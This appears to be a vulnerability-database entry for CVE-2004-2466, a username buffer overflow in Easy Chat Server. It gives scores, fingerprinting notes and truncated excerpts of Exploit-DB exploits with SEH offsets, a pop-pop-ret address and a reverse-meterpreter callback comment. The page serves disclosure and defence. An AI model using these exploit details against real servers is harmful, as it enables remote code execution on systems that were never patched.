CVE-2004-2466
published 2004-12-31
CVE-2004-2466: chat.ghp in Easy Chat Server 1.2 allows remote attackers to cause a denial of service (server crash) via a long username parameter, possibly due to a buffer…
Priority: P3 40 · medium · 5 CVSS 2.0
AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 74.70% (99.4th percentile)
chat.ghp in Easy Chat Server 1.2 allows remote attackers to cause a denial of service (server crash) via a long username parameter, possibly due to a buffer overflow. NOTE: it was later reported that 2.2 is also affected.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| efs_software | easy_chat_server | — | — |
| efs_software | easy_chat_server | — | — |
Detection & IOCs
- The SEH overwrite offset is dependent on the installation path of Easy Chat Server; the offset of 207 only applies when installed at 'C:\Program Files\EFS Software\Easy Chat Server'. Different install paths will shift the offset.
- Version 2.2 of Easy Chat Server still reports 'Easy Chat Server/1.0' in the Server HTTP header, making version fingerprinting via the header unreliable for distinguishing 1.x from 2.x.
- The CVE originally covered versions 1.2 and 2.2, but was later confirmed to also affect versions up to 3.1.
No detection rules found.
Exploit-DB
Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
exploitdb·2022-08-01·CVSS 5.0
---
```python
# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
# Exploit Author: r00tpgp @ http://www.r00tpgp.com
# Usage: python easychat-exploit.py
# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
# CVE: CVE-2004-2466
# Installer: http://www.echatserver.com/
# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)
#!/usr/bin/python3
import sys
import socket
from struct import pack
host = sys.argv[1] # Receive IP from user
port = int(sys.argv[2]) # Receive Port from user
junk = b"A" * 217
nseh = pack("<L", 0x06eb9090) # short jump 6 bytes
seh = pack("<L", 0x1001ae86) # pop pop ret 1001AE86 SSLEAY32.DLL
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f
```
Exploit-DB
EFS Easy Chat Server 3.1 - Remote Stack Buffer Overflow
exploitdb·2014-05-12
---
```python
## Exploit-DB Note: The offset to SEH is influenced by the installation path of the program.
## For this specific exploit to work, easy chat must be installed to:
## 'C:\Program Files\EFS Software\Easy Chat Server'
# Exploit Title: Easy Chat Server 3.1 stack buffer overflow
# Date: 9 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.echatserver.com/
# Software Link: http://www.echatserver.com/
# Version: 3.1
# Tested on: Windows 7 Enterprise SP1, English
#
# Description:
# A buffer overflow is triggered when passing a long username.
import socket
import struct
# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
# msfencode -b "\x00\x20" -i w32-exec-c
```
Exploit-DB
EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)
exploitdb·2010-08-06
---
```ruby
##
# $Id: efs_easychatserver_username.rb 9966 2010-08-06 20:12:51Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /Easy Chat Server\/1\.0/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in EFS Software Easy Chat Server.
```
Exploit-DB
EFS Easy Chat Server 2.2 - Remote Denial of Service
exploitdb·2007-08-14
---
# milw0rm.com [2007-08-14]
Metasploit
EFS Easy Chat Server Authentication Request Handling Buffer Overflow
metasploit
This module exploits a stack buffer overflow in EFS Software Easy Chat Server versions 2.0 to 3.1. By sending an overly long authentication request, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
- http://archives.neohapsis.com/archives/bugtraq/2004-07/0013.html
- http://archives.neohapsis.com/archives/fulldisclosure/2004-07/0077.html
- http://packetstormsecurity.com/files/167892/Easy-Chat-Server-3.1-Buffer-Overflow.html
- http://secunia.com/advisories/12006
- http://secunia.com/advisories/26461
- http://secunia.com/advisories/58427
- http://www.autistici.org/fdonato/advisory/EasyChatServer1.2-adv.txt
- http://www.exploit-db.com/exploits/33326
- http://www.osvdb.org/7416
- http://www.securityfocus.com/bid/25328
- http://www.securityfocus.com/bid/67384
- http://www.vupen.com/english/advisories/2007/2901
- https://exchange.xforce.ibmcloud.com/vulnerabilities/16629
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36013
- https://www.exploit-db.com/exploits/4289